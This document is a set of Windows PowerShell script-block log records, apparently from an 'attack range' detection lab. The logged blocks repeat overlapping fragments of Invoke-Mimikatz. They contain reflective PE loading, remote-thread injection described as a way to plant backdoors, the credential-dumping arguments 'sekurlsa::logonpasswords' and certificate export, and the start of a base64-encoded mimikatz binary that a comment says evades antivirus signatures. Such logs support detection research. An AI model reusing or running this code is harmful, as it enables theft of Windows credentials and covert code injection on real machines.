4104152150x0135657Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-1811Function Main { $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $Win32Constants = Get-Win32Constants $RemoteProcHandle = [IntPtr]::Zero #If a remote process to inject in to is specified, get a handle to it if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne "")) { Throw "Can't supply a ProcId and ProcName, choose one or the other" } elseif ($ProcName -ne $null -and $ProcName -ne "") { $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) if ($Processes.Count -eq 0) { Throw "Can't find process $ProcName" } elseif ($Processes.Count -gt 1) { $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId Write-Output $ProcInfo Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." } else { $ProcId = $Processes[0].ID } } #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege # if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) # { # Write-Verbose "Getting SeDebugPrivilege" # Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants # } if (($ProcId -ne $null) -and ($ProcId -ne 0)) { $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) if ($RemoteProcHandle -eq [IntPtr]::Zero) { Throw "Couldn't obtain the handle for process ID: $ProcId" } Write-Verbose "Got the handle for the remote process to inject in to" } #Load the PE reflectively Write-Verbose "Calling Invoke-MemoryLoadLibrary" try { $Processors = Get-WmiObject -Class Win32_Processor } catch { throw ($_.Exception) } if ($Processors -is [array]) { $Processor = $Processors[0] } else { $Processor = $Processors } if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) ) { Write-Verbose ( "Architecture: " + $Processor.AddressWidth + " Process: " + ([System.IntPtr]::Size * 8)) Write-Error "PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS." -ErrorAction Stop } #Determine whether or not to use 32bit or 64bit bytes if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8) { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64) } else { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32) } $PEBytes[0] = 0 $PEBytes[1] = 0 $PEHandle = [IntPtr]::Zero if ($RemoteProcHandle -eq [IntPtr]::Zero) { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs } else { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle } if ($PELoadedInfo -eq [IntPtr]::Zero) { Throw "Unable to load PE, handle returned is NULL" } $PEHandle = $PELoadedInfo[0] $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) { ######################################### ### YOUR CODE GOES HERE ######################################### Write-Verbose "Calling function with WString return type" [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "powershell_reflective_mimikatz" if ($WStringFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs) [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput) if ($OutputPtr -eq [IntPtr]::Zero) { Throw "Unable to get output, Output Ptr is NULL" } else { $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) Write-Output $Output $Win32Functions.LocalFree.Invoke($OutputPtr); } ######################################### ### END OF YOUR CODE ######################################### } #For remote DLL injection, call a void function which takes no parameters elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) { Throw "VoidFunc couldn't be found in the DLL" } $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions } #Don't free a library if it is injected in a remote process if ($RemoteProcHandle -eq [IntPtr]::Zero) { Invoke-MemoryFreeLibrary -PEHandle $PEHandle } else { #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Write-Verbose "Done!" }4b8a7d64-4d86-46f4-b7e3-266988fc4f4e 4104132150x0135655Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-1899d $ProcName -ne "") { $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) if ($Processes.Count -eq 0) { Throw "Can't find process $ProcName" } elseif ($Processes.Count -gt 1) { $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId Write-Output $ProcInfo Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." } else { $ProcId = $Processes[0].ID } } #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege # if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) # { # Write-Verbose "Getting SeDebugPrivilege" # Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants # } if (($ProcId -ne $null) -and ($ProcId -ne 0)) { $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) if ($RemoteProcHandle -eq [IntPtr]::Zero) { Throw "Couldn't obtain the handle for process ID: $ProcId" } Write-Verbose "Got the handle for the remote process to inject in to" } #Load the PE reflectively Write-Verbose "Calling Invoke-MemoryLoadLibrary" try { $Processors = Get-WmiObject -Class Win32_Processor } catch { throw ($_.Exception) } if ($Processors -is [array]) { $Processor = $Processors[0] } else { $Processor = $Processors } if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) ) { Write-Verbose ( "Architecture: " + $Processor.AddressWidth + " Process: " + ([System.IntPtr]::Size * 8)) Write-Error "PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS." -ErrorAction Stop } #Determine whether or not to use 32bit or 64bit bytes if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8) { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64) } else { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32) } $PEBytes[0] = 0 $PEBytes[1] = 0 $PEHandle = [IntPtr]::Zero if ($RemoteProcHandle -eq [IntPtr]::Zero) { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs } else { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle } if ($PELoadedInfo -eq [IntPtr]::Zero) { Throw "Unable to load PE, handle returned is NULL" } $PEHandle = $PELoadedInfo[0] $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) { ######################################### ### YOUR CODE GOES HERE ######################################### Write-Verbose "Calling function with WString return type" [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "powershell_reflective_mimikatz" if ($WStringFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs) [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput) if ($OutputPtr -eq [IntPtr]::Zero) { Throw "Unable to get output, Output Ptr is NULL" } else { $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) Write-Output $Output $Win32Functions.LocalFree.Invoke($OutputPtr); } ######################################### ### END OF YOUR CODE ######################################### } #For remote DLL injection, call a void function which takes no parameters elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) { Throw "VoidFunc couldn't be found in the DLL" } $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions } #Don't free a library if it is injected in a remote process if ($RemoteProcHandle -eq [IntPtr]::Zero) { Invoke-MemoryFreeLibrary -PEHandle $PEHandle } else { #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Write-Verbose "Done!" } Main }9e58e9b3-01dd-423a-968a-158a1b69e067 4104132150x0135224Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-1810211e (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS." -ErrorAction Stop } #Determine whether or not to use 32bit or 64bit bytes if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8) { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64) } else { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32) } $PEBytes[0] = 0 $PEBytes[1] = 0 $PEHandle = [IntPtr]::Zero if ($RemoteProcHandle -eq [IntPtr]::Zero) { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs } else { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle } if ($PELoadedInfo -eq [IntPtr]::Zero) { Throw "Unable to load PE, handle returned is NULL" } $PEHandle = $PELoadedInfo[0] $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) { ######################################### ### YOUR CODE GOES HERE ######################################### Write-Verbose "Calling function with WString return type" [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "powershell_reflective_mimikatz" if ($WStringFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs) [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput) if ($OutputPtr -eq [IntPtr]::Zero) { Throw "Unable to get output, Output Ptr is NULL" } else { $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) Write-Output $Output $Win32Functions.LocalFree.Invoke($OutputPtr); } ######################################### ### END OF YOUR CODE ######################################### } #For remote DLL injection, call a void function which takes no parameters elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) { Throw "VoidFunc couldn't be found in the DLL" } $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions } #Don't free a library if it is injected in a remote process if ($RemoteProcHandle -eq [IntPtr]::Zero) { Invoke-MemoryFreeLibrary -PEHandle $PEHandle } else { #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Write-Verbose "Done!" } Main } #Main function to either run the script locally or remotely Function Main { if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent) { $DebugPreference = "Continue" } Write-Verbose "PowerShell ProcessID: $PID" if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") { $ExeArgs = "sekurlsa::logonpasswords exit" } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") { $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit" } else { $ExeArgs = $Command } [System.IO.Directory]::SetCurrentDirectory($pwd) # mimikatz 2.2.0 (x64) #18362 # SHA256 hash: E4B762ECA32A797E305C9949504B95C4CDCF68FC8EEE0B3C101842488AF27D4F # VirusTotal Analysis: no signature yet ;) $PEBytes64 = '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